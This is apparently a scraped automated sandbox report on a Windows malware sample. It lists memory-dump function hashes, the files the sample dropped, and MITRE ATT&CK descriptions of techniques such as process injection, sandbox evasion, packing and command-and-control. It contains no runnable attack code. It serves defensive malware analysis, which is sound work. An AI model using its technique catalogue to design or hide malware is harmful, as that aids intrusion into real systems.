Opcode Fuzzy Hash: 5da26cb718de7d868e6305175e7dd96bea80cc94d0241c317be5a970b8b1684b
Instruction Fuzzy Hash: 42719131A0A385DFD702CF68C8919DA7FB1AF4A320B1A45D6D4C1EF2A2C7359C85CB61

Function 07580C68 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ff623eb6c583adc671164cb5e046671251238d8526e0e8c93a6ec5157c121be
Instruction ID: ff795c289b7417e0eb7dcb22970393ab4226e243e7c143a951c8099c020d0444
Opcode Fuzzy Hash: 3ff623eb6c583adc671164cb5e046671251238d8526e0e8c93a6ec5157c121be
Instruction Fuzzy Hash: CB5177B27053459FDBA1ABA488007E7BBA1BB82221F14C47BD549EF2D1DA31D849C7A1

Function 07580AF0 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 258ed1e8eadae91746b269e5139e4678c883614b946e9b286317b004ff9c3aad
Instruction ID: 1543fecdc664cd0c8ab1feefb0501a063dcc07e40928438138f3cf6f9de535d8
Opcode Fuzzy Hash: 258ed1e8eadae91746b269e5139e4678c883614b946e9b286317b004ff9c3aad
Instruction Fuzzy Hash: 7A3129B17002099BDB94ABB588403EEB3E5BFC5215F14853AC909EB390EA31DD46C794

Function 09010458 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1861282960.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 070576bf134e5de94cf15ff65912d50693a49c6ff0297cdd15f85597219789a9
Instruction ID: de5fa4b612083f07efac8d288b5861e0be3764e61c74b5725d9fed41fe3f767d
Opcode Fuzzy Hash: 070576bf134e5de94cf15ff65912d50693a49c6ff0297cdd15f85597219789a9
Instruction Fuzzy Hash: 23410B74A01619DFCB15CF9CC8849AEBBF2BF88320B258659E855EB365C731EC81CB54

Function 09010E18 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1861282960.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd26853b228bc2f69adffa374badef6bfbd837576278ea34ceba0ad82ea8b30b
Instruction ID: 186ccdefbee9bb5bf7eebe1cfa70fe117015c1b2b6d3b7d3a05e7ac7ab619ba0
Opcode Fuzzy Hash: cd26853b228bc2f69adffa374badef6bfbd837576278ea34ceba0ad82ea8b30b
Instruction Fuzzy Hash: 67411B74A00209DFCB05CF98C8859AEB7F2FF48324B258659E855EB364C335EC91CB94

Function 090117FA Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1861282960.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c7911d7336ac1fdd982e064db513a83111ed3525d253505a98b93dd2e4a6e3
Instruction ID: c32a8ec31b2632f59eff25d544d6738e9484c069fd747edc0ba3365efa0b6517
Opcode Fuzzy Hash: e8c7911d7336ac1fdd982e064db513a83111ed3525d253505a98b93dd2e4a6e3
Instruction Fuzzy Hash: 8F411C74A015099FDB59CF98C984AAEB7F2FF48320B248658E915EB3A4C731EC51CF94

Function 075848F0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3744bd9fb53bc6b2002853ce923271be2e9a84d10100df6907e04e23186a6ca8
Instruction ID: d6f3a234679b57cc7b5673bce2b057243c1cc544b95283808620248c17e44ed3
Opcode Fuzzy Hash: 3744bd9fb53bc6b2002853ce923271be2e9a84d10100df6907e04e23186a6ca8
Instruction Fuzzy Hash: E531D270B10204ABEB14EB64C914BEE77A3AFCA314F20C465E9016F7A1CF75DD428BA5

Function 07586114 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d13721a45436890f3202176fd38c39afcde10886d2b7e55cf93ceac13a2727a
Instruction ID: a54a6864a2fb77f47d853f60a66e20f93e0951a04f2889b77f3eac33d9295ffe
Opcode Fuzzy Hash: 3d13721a45436890f3202176fd38c39afcde10886d2b7e55cf93ceac13a2727a
Instruction Fuzzy Hash: 7C3128F17142028BDB546B6494113EAB792EBC6211F0484BAD503EF797DE36D942C7A2

Function 07580FD0 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36ca44e703aab54e0deb69b53c01d485d7cb75bbb75189792ed1bff0d8a5d5f4
Instruction ID: 1f8b5ba488128234520d8366d3a563c2d16bd035dd9a7348726fe282afb9a0c1
Opcode Fuzzy Hash: 36ca44e703aab54e0deb69b53c01d485d7cb75bbb75189792ed1bff0d8a5d5f4
Instruction Fuzzy Hash: 8B215AB530075AEBE76466B64C10BB7B7C6BBC5705F24C42EA506EB380DD76C8428360

Function 07580FB4 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 748296ed28a3d2d917abf08f8bcd1738ed43ec855e99911e11dd5babbcfb89d2
Instruction ID: 036ffeab024ec6442db24ecda651327245dd6c67fff7dc865a038c3c772fcb5f
Opcode Fuzzy Hash: 748296ed28a3d2d917abf08f8bcd1738ed43ec855e99911e11dd5babbcfb89d2
Instruction Fuzzy Hash: D1217CB53083D5AFE76116B24C107F27BE1AFC6214F28846BE545FF2C2D969C986C3A1

Function 07588643 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e212a8fa2345802fe502c7e01f9fa2b16beef738827004c3a29a0ff4bc8d5874
Instruction ID: e86a4c194c77cd9a9326a9c1e78f9aa47377b5e858ce0b1296b1a557ae4a7f10
Opcode Fuzzy Hash: e212a8fa2345802fe502c7e01f9fa2b16beef738827004c3a29a0ff4bc8d5874
Instruction Fuzzy Hash: C8019CB1B142A45BE7B123B408116DD37129FC3328B0500AACA017F762CA259C03C3E7

Function 09011EDA Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1861282960.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15bfd8ae013038e9720b677f2e599b1c0964f2b5c755c7d015e749b5e2d3e25e
Instruction ID: 0127256aa4eadb9fdcfeb38089be511c0cd9aef29be1f7134e3cd88b0e128844
Opcode Fuzzy Hash: 15bfd8ae013038e9720b677f2e599b1c0964f2b5c755c7d015e749b5e2d3e25e
Instruction Fuzzy Hash: 56F01D31A00109EFCB05DFC8D9409EDF7B6FF88320B258219E515B7260C7329D62DB54

Function 07581CB6 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e9b8f9b8e3bff01a03603c1e417db75abbec1704babcd5a16d558c28415c68a
Instruction ID: 36d918e608e359131aadddcf1067bb68b3f1a02ae1c29c71b274dc69d9f0c735
Opcode Fuzzy Hash: 8e9b8f9b8e3bff01a03603c1e417db75abbec1704babcd5a16d558c28415c68a
Instruction Fuzzy Hash: 45A01130280000ABC200CA00CC82820B320EB80208B28C0E8A8088F2A2CF23E8038A00

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AwMu7gR48D.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecynsohp.vif.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_foylndte.2fi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0vyifxw.x1t.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0yrrhwl.eyn.psm1

C:\Users\user\AppData\Local\Temp\nspE492.tmp\Banner.dll

C:\Users\user\AppData\Local\Temp\nspE492.tmp\UserInfo.dll

C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe

C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe:Zone.Identifier

C:\Users\user\AppData\Local\unshabbily\Hardwire\dicyclopentadienyliron.skr

C:\Users\user\AppData\Local\unshabbily\Hardwire\fjernkontrollers.hid

C:\Users\user\AppData\Local\unshabbily\Hardwire\irresolubleness.hje

C:\Users\user\AppData\Local\unshabbily\Hitliste.kak

C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
AwMu7gR48D.exe

Function 004031BB Relevance: 89.6, APIs: 33, Strings: 18, Instructions: 368
stringcomfileCOMMON

Function 00405194 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 004056F7 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 004065BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 00403B1C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 0040377F Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402D48 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00405F51 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 00405056 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 0040551C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Function 00406259 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00402F81 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Function 00405AF7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON